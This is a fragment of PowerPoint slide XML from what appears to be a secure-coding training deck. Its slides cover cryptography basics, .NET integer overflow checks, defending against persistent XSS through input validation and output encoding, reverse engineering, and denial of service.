                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="111" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="112" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="23" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="113" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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72" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1163" grpId="18"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1169" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1137" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1166" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1169" grpId="19"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1140" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1149" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1155" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1166" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1160" grpId="22"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1175" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1172" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1161" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1157" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1148" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1156" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1175" grpId="21"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1152" grpId="20"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1183" grpId="23"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1162" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1134" grpId="17"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1141" grpId="3"/>
    </p:bldLst>
  </p:timing>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5" name="Cryptography"/>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Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Asymmetric - RSA…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" marL="690033" indent="-232833" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8DACD0"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Asymmetric - RSA</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Symmetric - AES</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One-way (Hash algorithm) - SHA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="Never build your own algorithm!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967176" y="6538117"/>
            <a:ext cx="5919760" cy="625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nchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Never</a:t>
            </a:r>
            <a:r>
              <a:t> build your own algorithm!</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1" name="Encryption"/>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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="“Don’t leave your keys by the door”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926285" y="7505365"/>
            <a:ext cx="4019126" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Don’t leave your keys by the door”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="House01" descr="House01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861289" y="2509366"/>
            <a:ext cx="4149118" cy="3761868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Security_Keys01" descr="Security_Keys01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4866447">
            <a:off x="5813121" y="5796696"/>
            <a:ext cx="1225144" cy="1736295"/>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7" name="First line of Defence ?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>First line of Defence ?</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8" name=".NET Memory Security Concerns"/>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.NET Memory Security Concerns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Buffer overflows can only occur in unmanaged code…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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Buffer overflows can only occur in unmanaged code</a:t>
            </a:r>
          </a:p>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Be aware of the limitations of your chosen data types</a:t>
            </a:r>
          </a:p>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Integer overflows / underflows can still occur unless safeguards are enabled:</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rPr i="1"/>
              <a:t>CheckForOverflowUnderflow</a:t>
            </a:r>
            <a:r>
              <a:t> (C#)</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rPr i="1"/>
              <a:t>RemoveIntegerChecks</a:t>
            </a:r>
            <a:r>
              <a:t> (VB.NET)</a:t>
            </a:r>
          </a:p>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Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>checked</a:t>
            </a:r>
            <a:r>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>unchecked</a:t>
            </a:r>
            <a:r>
              <a:t> keyword (C#)</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3" name="Persistent XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265929" y="364423"/>
            <a:ext cx="1887362" cy="460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200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Persistent XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="where the malicious string originates from the website's database."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572341" y="8848048"/>
            <a:ext cx="8489005" cy="460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200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>where the malicious string originates from the website's database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1205" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1188871"/>
            <a:ext cx="13004801" cy="7375858"/>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7" name="Defending Against XSS (cont.)"/>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Defending Against XSS (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Input validation…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Input validation</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First line of defense – can eliminate many possible vulnerabilities, but doesn’t necessarily eliminate all of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Output encoding</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By encoding user-supplied data at display time, we can ensure that the client browser will interpret it literally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Platform features</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RequestValidation property</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ViewStateUserKey property</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0" name="Defending Against XSS (cont.)"/>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Defending Against XSS (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Server.HtmlEncode() doesn’t always protect your app……"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Server.HtmlEncode() doesn’t always protect your app…</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 It only encodes &lt; &gt; &amp; “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Use IOSec (properly implemented)</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EncodeHtml()</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EncodeHtmlAttribute()</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EncodeVbs()</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AsUrl()</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rPr u="sng">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://toolbox/details/details.aspx?ToolID=22241</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13" name="http://i.msdn.microsoft.com/gg598983.4(en-us,MSDN.10).jpg" descr="http://i.msdn.microsoft.com/gg598983.4(en-us,MSDN.10).jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="325119" y="325119"/>
            <a:ext cx="12192001" cy="9238830"/>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5" name="Reverse Engineering"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Reverse Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Body"/>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8" name="Daniel of Service"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Daniel of Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12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1" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6739466" y="4553937"/>
            <a:ext cx="4348481" cy="2113282"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E8F6E4"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222" name="What is Denial of Service (DoS)?"/>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What is Denial of Service (DoS)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1237" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5204177" y="3050257"/>
            <a:ext cx="7233921" cy="5159024"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7233920" cy="5159022"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1223" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="860213" y="2517422"/>
              <a:ext cx="5879254" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1224" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3754684" y="1052124"/>
              <a:ext cx="1" cy="3203788"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1225" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1919111" y="1408853"/>
              <a:ext cx="3601156" cy="2488072"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1226" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2047804" y="1354667"/>
              <a:ext cx="3382152" cy="2395502"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1227" name="Server01" descr="Server01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2917048" y="1618826"/>
              <a:ext cx="1584961" cy="1761068"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1228" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1225973" y="3330222"/>
              <a:ext cx="1300481" cy="1368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1229" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4743591" y="3291840"/>
              <a:ext cx="1300481" cy="1368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1230" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2966720" y="3790808"/>
              <a:ext cx="1300481" cy="1368215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1231" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1937173"/>
              <a:ext cx="1300481" cy="1368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1232" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
